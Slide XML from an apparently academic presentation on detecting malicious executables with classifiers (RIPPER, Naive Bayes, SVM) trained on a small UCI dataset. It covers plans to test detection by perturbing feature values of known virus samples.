          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Algorithm:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>RIPPER/NB/Multi-NB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Best:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Multi-NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(97.76%)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Schultz, Matthew G., et al. "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Data mining methods for detection of new malicious executables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Security and Privacy, 2001. S&amp;P 2001. Proceedings. 2001 IEEE Symposium on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>. IEEE, 2001.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725924" y="3307158"/>
            <a:ext cx="8641976" cy="2665358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7711514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dissolv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Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="2259106"/>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smtClean="0"/>
              <a:t>Use WEKA + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>train</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>a model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Generate new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>data points and test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="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4989" y="2259106"/>
            <a:ext cx="1508760" cy="792480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6455921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Originality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2089342" y="2545422"/>
            <a:ext cx="2656198" cy="2124959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7364894" y="2054085"/>
            <a:ext cx="3107635" cy="3107635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4745540" y="3607902"/>
            <a:ext cx="2619354" cy="1"/>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265555" y="5357187"/>
            <a:ext cx="8035734" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>How should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>softwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> detect a known/unknown type of virus?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5591398" y="3033593"/>
            <a:ext cx="1241381" cy="1241381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7975516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Originality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2089342" y="2545422"/>
            <a:ext cx="2656198" cy="2124959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7364894" y="2054085"/>
            <a:ext cx="3107635" cy="3107635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301499" y="1905000"/>
            <a:ext cx="1507435" cy="1507435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4745540" y="3607902"/>
            <a:ext cx="2619354" cy="1"/>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a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5748226" y="3805782"/>
            <a:ext cx="613980" cy="1110022"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1651192" y="5357187"/>
            <a:ext cx="9093007" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>a virus can hide itself from the detection of antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>softwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20623422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800" dirty="0" smtClean="0"/>
              <a:t>No “names” file attached with the dataset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> attribute meaning unknown</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Solution: contact author for help; otherwise can only do blind tests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15920078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startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Low instance number (only 373 samples)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>goal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to exhaustively find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>best</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>to classify malicious and non-malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>executables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>the low sample amount is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>tolerable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21427363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startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Difficulty in generating new data instances</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Solution: without legal access to real-world virus samples, we can test by directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>modifying attribute values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> in given malicious samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7534328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Evaluation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1719256"/>
            <a:ext cx="8915400" cy="3777622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Key: comparison with known hiding schemes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Diagram 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355853010"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="617538" y="2614611"/>
          <a:ext cx="5434015" cy="3880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368198428"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6500813" y="2614611"/>
          <a:ext cx="5453059" cy="38809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1397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Malicious Executable Dataset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427847" y="1264555"/>
            <a:ext cx="8915400" cy="4184073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ataset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>retrieved from UCI ML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>repository</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>500 hex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>features, 13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>72 benign samples, 301 virus samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427847" y="1954973"/>
            <a:ext cx="9764153" cy="1411193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1740743" y="4520328"/>
            <a:ext cx="4425267" cy="2337672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480272" y="4661647"/>
            <a:ext cx="5711728" cy="2004874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8289634" y="2429736"/>
            <a:ext cx="935666" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>530</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170396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Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1596325"/>
            <a:ext cx="8915400" cy="44404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smtClean="0"/>
              <a:t>Data preprocessing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>train</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
